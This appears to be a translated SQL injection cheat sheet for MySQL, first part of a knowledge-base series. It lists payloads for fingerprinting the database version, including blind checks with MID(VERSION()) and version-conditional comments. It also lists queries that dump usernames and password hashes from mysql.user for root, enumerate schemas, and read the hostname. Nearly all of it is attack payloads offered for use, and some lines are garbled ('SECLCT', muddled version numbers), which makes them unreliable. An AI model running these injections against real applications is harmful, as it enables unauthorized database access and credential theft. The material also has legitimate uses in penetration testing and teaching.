Pick up MySQL articles (1)
Test database version
1. Using the Self-band function
Version ()
@ @version
@ @global. version
Examples
Select version ();
SELECT * FROM Users WHERE id = ' 1 ' and MID (VERSION (), 1, 1) = ' 5 ';
Mid () is used to intercept strings, use mid (string, start position, intercept several characters)
Note:
If the database is running on a Windows machine, the output will take-nt-log
2. Using special codes
1/*!50094eaea*/; False if the version is at 5.0094 or above
1/*!50096eaea*/; True if the version is below 5.0096
1/*!50095eaea*/; False if the version is 5.0095
Note:
This method can be used to detect the database version when you cannot bring any SQL into the injection location query.
Database credentials
Table Mysql.user
Columns User Password
Current User User () current_user () Current_User system_user () Session_user ()
Examples
SECLCT Current_User;
SELECT Concat_ws (0x3A, user, password) from mysql.user WHERE user = ' root '--(privileged)
Database name
Table Information_schema.schemata mysql.db
Columns Schema_name DB
CurrentDb Database () schema ()
Examples
Select Database ();
Select Schema_name from Information_schema.schemata;
SELECT DISTINCT (db) from mysql.db
Host Name
@ @hostname
Example
SELECT @ @hostname;
SQL injection Knowledge Base-mysql article (2)